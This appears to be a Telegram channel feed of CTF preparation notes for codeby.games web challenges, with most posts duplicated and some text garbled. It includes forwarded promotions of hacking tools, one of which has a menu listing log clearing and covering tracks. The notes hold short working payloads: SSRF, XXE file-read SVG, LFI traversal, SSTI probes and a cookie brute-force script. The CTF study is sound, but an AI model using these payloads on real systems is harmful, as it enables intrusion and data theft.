codeby.games room: https://codeby.games/categories/web/4039cd20-79ed-4166-a975-968959212b69
First payload for this room: https://127.0.0.1/admin/panel.php?username=admin&password=admin
Final payload: https://127.0.0.1/admin/panel.php?username=admin&password=*****
Vulnerable type: SSRF
#Preparation #For #CTF
First payload for this room: https://127.0.0.1/admin/panel.php?username=admin&password=admin
Final payload: https://127.0.0.1/admin/panel.php?username=admin&password=*****
Vulnerable type: SSRF
#Preparation #For #CTF
๐ฅ1
godeby.games room: https://codeby.games/categories/web/ca07034b-bde4-4c87-bc9d-bccea9cc9dd1
Vunerable type: Manipulation GET and POST requests
#Preparation #For #CTF
Vunerable type: Manipulation GET and POST requests
#Preparation #For #CTF
๐ฅ1
https://www.boxentriq.com/code-breaking/cipher-identifier
Automatically determine the type of encoding
Automatically determine the type of encoding
๐จโ๐ป1
Gourlex
It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
๐Link https://github.com/trap-bytes/gourlex
It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.
๐Link https://github.com/trap-bytes/gourlex
Forwarded from Cat Seclist
#HacKingPro - Hack Like A Pro
Menu / To Do
[p] - Planning and Scoping
Asking for Target IP:
Asking for Target Name:
Asking for Target Phone:
Asking for Target Nik Name:
Asking for Target Email:
00 - Anonymity
00 - Firewall Rules
01 - Clear Logs
02 - Clear History
03 - Change MAC Address
04 - Change IP Address
05 - Change Routing
01 - Information Gathering
01 - Systems Information
02 - Networks Information
03 - Social Information
04 - SubDomain Information
02 - Vulnerability Assessment
03 - Web Application HacKing
04 - Database Assessment
05 - Password HacKing
06 - Wireless HacKing
07 - Reverse Engineering
08 - Exploit Frameworks & DataBases
09 - Sniffing - Spoofing
10 - Gaining & Maintaining Access
11 - Digital Forensic
12 - Analysis & Reporting
13 - Social Engineering
14 - Privilege Enumeration & Escalation
15 - Malware Analysis Labs/Tools
16 - Covering Tracks
https://github.com/Anlominus/HacKingPro
Menu / To Do
[p] - Planning and Scoping
Asking for Target IP:
Asking for Target Name:
Asking for Target Phone:
Asking for Target Nik Name:
Asking for Target Email:
00 - Anonymity
00 - Firewall Rules
01 - Clear Logs
02 - Clear History
03 - Change MAC Address
04 - Change IP Address
05 - Change Routing
01 - Information Gathering
01 - Systems Information
02 - Networks Information
03 - Social Information
04 - SubDomain Information
02 - Vulnerability Assessment
03 - Web Application HacKing
04 - Database Assessment
05 - Password HacKing
06 - Wireless HacKing
07 - Reverse Engineering
08 - Exploit Frameworks & DataBases
09 - Sniffing - Spoofing
10 - Gaining & Maintaining Access
11 - Digital Forensic
12 - Analysis & Reporting
13 - Social Engineering
14 - Privilege Enumeration & Escalation
15 - Malware Analysis Labs/Tools
16 - Covering Tracks
https://github.com/Anlominus/HacKingPro
Forwarded from Cat Seclist
#ScanPro - NMap Scanning Scripts
ScanPro Menu
[1] Target Selection
[2] Port Selection
[3] Scan Types
[4] Service and Operating System Detection
[5] Output formats
[6] NSE Scripting
[7] HTTP info gathering
[m] Main Menu
https://github.com/Anlominus/ScanPro
ScanPro Menu
[1] Target Selection
[2] Port Selection
[3] Scan Types
[4] Service and Operating System Detection
[5] Output formats
[6] NSE Scripting
[7] HTTP info gathering
[m] Main Menu
https://github.com/Anlominus/ScanPro
codeby.games room: Cookie Jar
Cookie Bruter:
#Preparation #For #CTF
Cookie Bruter:
import requests
s = requests.Session()
i=0
for i in range(129):
i+=1
r=s.get('TARGET_IP:PORT', cookies={'id': str(i)})
print(r.text)
#Preparation #For #CTF
codeby.games room: Broken box
Vulnerable Type: XXE Injection
Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]>
<svg width="200px" height="200px" xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
#Preparation #For #CTF
Vulnerable Type: XXE Injection
Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]>
<svg width="200px" height="200px" xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
#Preparation #For #CTF
๐ฅ1
Forwarded from Cat Seclist
Hackyx - A cybersecurity search engine for IT security resources like #CTF writeups and #BugBounty reports.
ยป https://hackyx.io/
ยป https://hackyx.io/
๐ฅ1
Forwarded from Cat Seclist
Hi everyone checkout the new tool Dnsbruter which is an asynchronous Dns brutforcing and Fuzzing tool to brutforce and get subdomains which can handle high loads wordlist, threads etc with custome resolvers which will be a new replacing tool for puredns to not crash your network anymore, to install the Dnsbruter see here: https://github.com/RevoltSecurities/Dnsbruter
codeby.games room: Regular page
Vulnerable Type: LFI
Simple payload: /../../../../flag.txt
#Preparation #For #CTF
Vulnerable Type: LFI
Simple payload: /../../../../flag.txt
#Preparation #For #CTF
๐ฅ1
codeby.games room: Congratulations application
Vulnerable Type: SSTI
Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables โ> {{config.items()}}
Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'
#Preparation #For #CTF
Vulnerable Type: SSTI
Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables โ> {{config.items()}}
Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'
#Preparation #For #CTF
๐ฅ1